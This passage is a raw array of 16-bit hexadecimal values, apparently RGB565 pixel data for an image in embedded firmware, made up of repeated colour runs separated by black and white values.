0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 